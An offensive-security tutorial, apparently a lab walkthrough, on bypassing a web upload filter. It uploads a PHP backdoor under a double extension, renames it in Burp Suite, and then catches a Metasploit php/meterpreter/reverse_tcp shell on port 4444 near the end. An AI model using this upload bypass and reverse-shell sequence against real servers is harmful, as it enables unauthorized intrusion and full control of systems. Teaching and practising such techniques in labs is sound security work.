White Hat Institute

File upload using a double extension method

Some web applications with a medium security level configuration will allow you to upload files that have certain types of extensions like “.jpeg” and “.png.”

In other words, uploading documents is limited to these sorts of expansions; else, they won’t have the option to get uploaded on the web server. To bypass this, we need to deceive the web server by inserting a file with multiple extensions.

In this example, we will try to upload the same malicious file we used previously but rename it to “image_file.php.jpeg.” It will seem as if it is of the “.jpeg” format having some data, but in reality, it will execute the “.php” file leading to an application.

Before jumping to hands-on activity, let’s set the security level of the target web server to a medium.

File upload

To be successful in any web application attacks, we need to be proficient in the “Burp Suite” tool. “Burp Suite” is a graphical tool designed for testing Web application security. It is intended to give a far-reaching solution for web application security checks. Notwithstanding fundamental usefulness, such as a scanner, proxy server, and intruder, the device additionally contains further developed choices, like a repeater, spider, comparer, decoder, extender, and sequencer. 

Burp Proxy enables manual security analyzers to catch all requests and responses between the browser and the objective application, in any event, when HTTPS is being utilized. We can view, edit, or drop individual messages to manipulate the server-side or client-side components of the application.

Kali Linux comes preinstalled with “Burp Suite,” go to the application menu and search for it. Once you located it, double click on it to start the tool. To intercept all requests and responses between the browser and the server, we need to perform a small configuration on our browser proxy and change it to Burp’s interface. To do so, first go to the “Proxy” tab of the “Burp Suite,” and under the “Options” tab, locate the interface and note it down.

File upload 17

Then open up your Firefox browser and go to the “General” settings.

File upload 18

Under the “Network Proxy” settings, select the “Manual proxy configuration” option and type the Burp’s interface. Now our “Burp Suite” is ready to intercept all online communications.

File upload 19

Let’s upload our malicious file with a double extension onto the web server.

File upload 20

Once you click on “Upload,” go to the “Burp Suite” to analyze the intercepted traffic. Form the Burp tool, click on the “Proxy” tab and go to the “Intercept” tab. Under the “Headers” tab, locate the filename “image_file.php.jpeg” and rename it to “image_file.php,” make sure that the filename is within the quotation marks. Then click on the “Forward” button to perform the upload action.

File upload 21

As you can see in the image below, we have successfully uploaded our PHP file to a web server with a medium security level. To exploit it further, copy the path of the uploaded file and use it in the URL search box.

File upload 22

Before doing that, we need to start the multi-handler and listen for an incoming connection.

Ex: (msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost

msf5 exploit(multi/handler) > set lport 4444

msf5 exploit(multi/handler) > exploit).

File upload 23

Now we can paste the path and run the backdoor on the server-side.

File upload 24

Once our malicious file is executed, the attacker’s computer will receive a reverse shell connection with full root control.

File upload 25